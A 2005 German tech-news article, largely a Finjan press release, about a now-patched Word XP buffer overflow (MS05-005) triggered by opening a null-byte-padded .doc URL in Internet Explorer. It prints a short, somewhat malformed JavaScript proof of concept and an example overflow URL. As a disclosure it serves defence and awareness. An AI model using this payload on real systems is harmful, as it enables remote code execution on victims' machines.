tom's networking guide
 
Anzeige
Wireless USB  >
< HP-Chefin Fiona Carly schmeisst hin
10.02.05 09:51 Alter: 16 Jahre
Kategorie: Security
Von: Arno Kral

Gefährliche Sicherheitslücke in Microsoft Word

Finjan Software entdeckt Sicherheitsproblem - Patch ab sofort verfügbar


Finjan Internet-1Box

Zusammen mit Microsoft hat Finjan Software, Anbieter für proaktives Secure Content Management, eine kritische Schwachstelle in Microsoft Word XP beseitigt. Das Forschungslabor Malicious Code Research Center (MCRC) des Security-Anbieters hatte bereits im Juli 2004 die Möglichkeit des Buffer Overflows beim Öffnen eines Word-Dokuments im Internet Explorer entdeckt. Dadurch können Hacker von außen auf den Rechner zugreifen und unter ihre Kontrolle bringen. Finjan hatte Microsoft unverzüglich über das Problem informiert und alle technischen Details zur Verfügung gestellt. Zusätzlich hat der Security-Anbieter an der Erstellung des Patches mitgearbeitet, der ab sofort unter http://www.microsoft.com/technet/security/Bulletin/MS05-005.mspx herunter geladen werden kann.

"Bei der Erforschung von neuen Entwicklungen und Risiken im Sicherheitsmarkt bleibt Finjans Malicious Code Research Center (MCRC) Vorreiter", unterstreicht Shlomo Touboul, CEO und Gründer Finjan Software. "Wir haben mit Microsoft eng zusammengearbeitet, um die von uns gefundene Lücke zu schließen. Auch in anderen Fällen kooperieren wir mit dem Hersteller, um die IT-Security maßgeblich zu verbessern und zu gewährleisten."

Finjan-Kunden ausser Gefahr

Das identifizierte Sicherheitsloch enthält eine ungeeignete Filterfunktion in Microsoft Word XP, die zu einem Buffer Overflow führen kann. Nutzen Hacker diesen Fehler aus, können sie sich unbemerkt einen externen Zugang zum System verschaffen und großen Schaden anrichten. Der Anwender wird dazu einfach auf eine manipulierte Webseite weitergeleitet.

Große Unternehmen, die die aktuelle Version der Vital Security-Produktserie von Finjan nutzen, sind von dieser Gefahr nicht betroffen. Ebenso schützt Finjans 1Box-Serie kleine und mittelständische Unternehmen proaktiv vor der beschriebenen und weiteren, noch unbekannten Schwachstellen. Die Kombination verschiedener Sicherheitsebenen mit der patentierten Behaviour Blocking Technologie (Verhaltensanalyse) in Finjans Lösungen sichert Unternehmensnetzwerke gegen jegliche Bedrohungen und Attacken aus dem Internet.

Technische Details

Finjan Security Advisory zur Microsoft Office XP Remote Buffer Overflow Vulnerability. Wird eine Datei mit doc.-Endung im Internet Explorer geöffnet, dann übernimmt Microsoft Word XP den Befehl und öffnet die Datei. Ein Problem taucht dann auf, wenn bei der Dateiausführung ein Null-Byte (Parser) am Ende des Filenamens steht. Ein Beispiel für eine gültige Anfrage ist http://www.myhost.com/myfile.doc. Dagegen stellt http://www.myhost.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...aa.doc einen ungültigen Link dar. Diese Eingabe würde an den Server gesendet werden, der das Word-Dokument verwaltet.

Die meisten Web-Server - wie IIS und Apache etwa - trennen die Ziffern vor dem %00 beim Übermitteln des Dokumentnamens zum Internet Explorer. Dabei übergibt der Internet Explorer den String (Zeichenkette) an Microsoft Word XP. Allerdings erhält Word nun eine lange Zeichenkette, die dann zum Buffer Overflow führt und dadurch das Ausführen von Befehlen durch Dritte zulässt.

Code (Proof of Concept)

<script>

var mylongstring,myjunk;

mylongstring ="";

myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";

for(c=1;c<5000;c++)

{

  mylongstring = mylongstring + myjunk;

}

window.open(http://www.hhs.gov/ocr/privacysummary.rtf%0a0 + mylongstring"); </script>

Status der Sicherheitslücke

Microsoft wurde am 13.Juli 2004 informiert. Der Bug ist nun behoben. Weitere Details enthält das Microsoft Security Bulletin MS05-005.

 

Über das Malicious Code Research Center (MCRC) Das Malicious Code Research Center (MCRC) ist die führende Forschungsabteilung bei Finjan Software, die potenzielle Internet- und E-Mail Attacken erforscht und aufspürt. MCRC's Ziel ist es, Hackern immer einige Schritte voraus zu sein. Sie sollen daran gehindert werden, offene Plattformen und Technologien für die Entwicklung der nächsten Generation an bösartigem mobilen Code, Würmern, Trojanern, Viren und Schnüffelprogrammen zu missbrauchen. Forscher des MCRC tragen ebenfalls zur Weiterentwicklung der Schutzmechanismen in Finjans proaktiven Secure Content Management-Lösungen bei. Weitere Informationen finden Sie unter http://www.finjan.com/mcrc/. Die oben genannten Sicherheitslücken wurden von Rafel Ivgi, Security Researcher bei Finjans MCRC Abteilung


Leserkommentar

Keine Kommentare

Kommentar hinzufügen

* - Pflichtfeld

*





*
*
Rubriken
Anzeige
Anzeige
Anzeige
Anzeige
News

CeBIT 2018 - ein holpriger Neustartversuch

CeBIT Logo

"Die CEBIT 2018 wird ein Business-Festival für Innovation und Digitalisierung", sagte Oliver Frese...

[mehr]

Trend Micro trauert um Günter Untucht

Günter Untucht (Bild: Trend Micro)

Der europäische Chefjustiziar von Trend Micro, Günter Untucht, ist Ende Januar überraschend...

[mehr]

Corel VideoStudio Ultimate 2018 mit neuen Funktionen verfügbar

Corel Logo (Grafik: Logo)

Erste Wahl für anspruchsvolle Gelegenheitsanwender – diesen Anspruch erfüllt das...

[mehr]

Argus 2 - kabellose Überwachungskamera für Akku- und Solarbetrieb

Die Argus 2 ist für innen und außen geeignet. (Bild: Reolink)

Reolink stellt mit der Argus 2 seine neueste Kamera vor. Die innovative Überwachungskamera...

[mehr]

Meltdown und Spectre: MSI liefert BIOS-Updates für Z370-Mainboard

MSI Logo

Mit den Updates will MSI mögliche SIcherheitslücken im aktuellen Intel-Microcode schließén. Updates...

[mehr]

CES 2018: Acer lässt Gamer-Herzen höher schlagen

Acer Nitro 5 (Bild: Acer)

Ob für Gamer, Kreative oder Business-Nutzer - auf der CES in Las Vegas stellt Acer für jeden etwas...

[mehr]
Anzeige
Anzeige